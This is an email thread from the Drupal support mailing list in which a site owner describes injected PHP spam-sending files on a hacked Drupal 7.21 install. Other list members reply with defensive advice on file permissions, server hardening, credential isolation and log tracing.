<div dir="ltr">Looks like they were able to break into the web server layer at least and inject server executable files. It was probably an automated script. So maybe they did not get hold of server level access or database access. However still, the break-in could have happened from many angles, not just Drupal (web application).<div><br></div><div>1. You need to secure your entire server stack:</div><div>- Operating system (did you update for the shellshock bug?)</div><div> - What's your OS? You should ask this in that OS's security forum also..<br><div class="gmail_extra"> - How strong is your password? Do you allow remote root access?</div><div class="gmail_extra"><br></div><div class="gmail_extra">- Web server</div><div class="gmail_extra"> - Subdomains, ports .. do you have any "private testing" subdomains that might have lower security? Exposed buggy code?</div><div class="gmail_extra"><br></div><div class="gmail_extra">- Database</div><div class="gmail_extra"> - Do you allow remote access?</div><div class="gmail_extra"> - Password strength?</div><div class="gmail_extra"> - How many human users have access?</div><div class="gmail_extra"><br></div><div class="gmail_extra"><div>- Do all applications share the same credentials to the database? <br></div><div>-- If there's an sql injection hole in one web app, the attacker might have used the shared password to gain access into Drupal. So you have to isolate all apps to individual restricted credentials.</div><div>-- Is there any db user credentials with global privileges? Apps using that kind of privileges are suspect .. </div><div><br></div><div>- What other non-standard server applications did you install? <div><br></div><div>- What other web applications did you install?</div><div>-- Use strong httpwd password screens to restrict access to every web facing application. Things like phpmyadmin can have vulnerabilities that haven't even been published. Even without password, some applications can grant access to data & database credentials. </div></div><div><br></div><div>- How about file permissions? Did you ever do chmod 777 anywhere (especially web folders)? That would allow write access to anyone to that file/folder, so they can inject a shell script and run commands.</div><div><br></div><div>- Drupal itself:</div><div>-- Did you write any custom code?</div><div>-- Did you install any 3rd party modules / themes etc?</div><div><br></div><div>- PHP</div><div>-- You need to secure your php by disabling dangerous functions etc. </div><div><br></div><div>2. Above are all considerations for just your machine. The attack could have come from another machine that has privileged access to your server also. </div><div><br></div><div>- Do an nmap. See what ports are available to internet. Remove everything that's not essential, secure everything else. </div><div><br></div><div>3. If your server was used for spamming, it's probably blacklisted - check with senderscore, spamhaus etc. Use <a href="http://emailsecuritygrader.com">emailsecuritygrader.com</a> etc to check all your domains.</div><div><br></div><div>4. You need to trace back to when the files were modified, and when the attacker gained access. Check ssh logs, httpd logs, mail logs, git logs etc. Maybe your server host can help to pinpoint suspicious traffic.</div><div><br></div><div>So I'd first trace back to the first scanning attempts by the attacker. That might give you a clue as to how he eventually succeeded. Perhaps he used a consistent group of IPs that you can pull out from your logs..</div><div><br><div>Best Regards</div><div>Alex</div><div><br></div></div>
<br><div class="gmail_quote">On 29 October 2014 17:12, Naveen Valecha <span dir="ltr"><<a href="mailto:er.naveenvalecha@gmail.com" target="_blank">er.naveenvalecha@gmail.com</a>></span> wrote:<br><blockquote class="gmail_quote" style="margin:0px 0px 0px 0.8ex;border-left-width:1px;border-left-color:rgb(204,204,204);border-left-style:solid;padding-left:1ex"><div dir="ltr">For more about securing file permissions<br><a href="https://www.drupal.org/node/244924" target="_blank">https://www.drupal.org/node/244924</a><br></div><div class="gmail_extra"><br><div class="gmail_quote"><div><div class="h5">On Wed, Oct 29, 2014 at 1:25 PM, Don <span dir="ltr"><<a href="mailto:donald@fane.com" target="_blank">donald@fane.com</a>></span> wrote:<br></div></div><blockquote class="gmail_quote" style="margin:0px 0px 0px 0.8ex;border-left-width:1px;border-left-color:rgb(204,204,204);border-left-style:solid;padding-left:1ex"><div><div class="h5">
<div bgcolor="#FFFFFF" text="#000000">
<div>In addition to updating core and and
contributed modules, I'd look at how permissions are set up too.<br>
Since i don't update from the admin panel, the only files that can
be added or changed are in /sites/default/files. You could
probably make this harder to figure out by changing the names a
bit.<br>
<br>
I run apache webserver under user 'apache2' and giving write
permissions only in those directories. The other files are owned
by a user and a team group account.<br>
<br>
I wonder if you could do some more magic by not letting *.php
files in /sites/default/files be run but downloaded only?<br>
<br>
-- <br>
-Don Pickerel-<br>
Fane Software<br>
<img alt="" src="cid:part1.04040308.02020105@fane.com" height="70" width="66"><div><div><br>
<br>
On 10/29/2014 3:17 AM, Ahilan Rajan wrote:<br>
</div></div></div><div><div>
<blockquote type="cite">
<div dir="ltr">
<div class="gmail_quote">Hi,<br>
<br>
I had installed drupal 7.21 to run a simple website on my
server. All<br>
seemed well till one day last week I started getting huge
amount of<br>
spam emails from the server which was hosting the website.<br>
<br>
On further analysis of the postfix mail queue on the server, I
found<br>
all the emails were generated by TWO php files (css76.php in
the<br>
modules/panels/js directory and session.php in the<br>
sites/all/libraries/jquery.cycle directory) . These two files
were<br>
NEWLY created/injected files and seemed bogus containing a
number of<br>
symbols along with a base64_decode return statement.<br>
<br>
Clearly my drupal setup had been hacked and someone had
successfully<br>
injected these files to send spam email (amongst other things
I<br>
presume)<br>
<br>
I shutdown the site, installed Security Review and Hacked
modules and<br>
carried out their recommendations and also checked my file
permissions<br>
via recommended scripts.<br>
<br>
However I am still not sure what the entry point for this hack
was in<br>
my setup and whether I am fully secure yet in this setup. Any<br>
suggestions or points in this regard would be highly
appreciated.<br>
<br>
thanks<br>
Drupal Newbie<br>
</div>
<br>
</div>
<br>
<fieldset></fieldset>
<br>
</blockquote>
<br>
<br>
</div></div><span><font color="#888888"><div>-- <br>
<br>
<div>-- <br>
-Don Pickerel-<br>
Fane Software<br>
<img alt="" src="cid:part1.04040308.02020105@fane.com" height="70" width="66"><br>
</div>
</div>
</font></span></div>
<br></div></div><span class="">--<br>
[ Drupal support list | <a href="http://lists.drupal.org/" target="_blank">http://lists.drupal.org/</a> ]<br></span></blockquote></div><span class=""><br><br clear="all"><br>-- <br><div dir="ltr"><div style="color:rgb(34,34,34);font-family:arial,sans-serif;font-size:13px;font-style:normal;font-variant:normal;font-weight:normal;letter-spacing:normal;line-height:normal;text-align:start;text-indent:0px;text-transform:none;white-space:normal;word-spacing:0px">Naveen valecha<br></div><div style="color:rgb(34,34,34);font-family:arial,sans-serif;font-size:13px;font-style:normal;font-variant:normal;font-weight:normal;letter-spacing:normal;line-height:normal;text-align:start;text-indent:0px;text-transform:none;white-space:normal;word-spacing:0px">Web : <a href="http://valechatech.com/" target="_blank">http://valechatech.com</a><br></div><div style="color:rgb(34,34,34);font-family:arial,sans-serif;font-size:13px;font-style:normal;font-variant:normal;font-weight:normal;letter-spacing:normal;line-height:normal;text-align:start;text-indent:0px;text-transform:none;white-space:normal;word-spacing:0px">Twitter: <a href="http://twitter.com/NaveenValechaNV" target="_blank">http://twitter.com/NaveenValechaNV</a></div></div>
</span></div>
<br>--<br>
[ Drupal support list | <a href="http://lists.drupal.org/" target="_blank">http://lists.drupal.org/</a> ]<br></blockquote></div><br></div></div></div>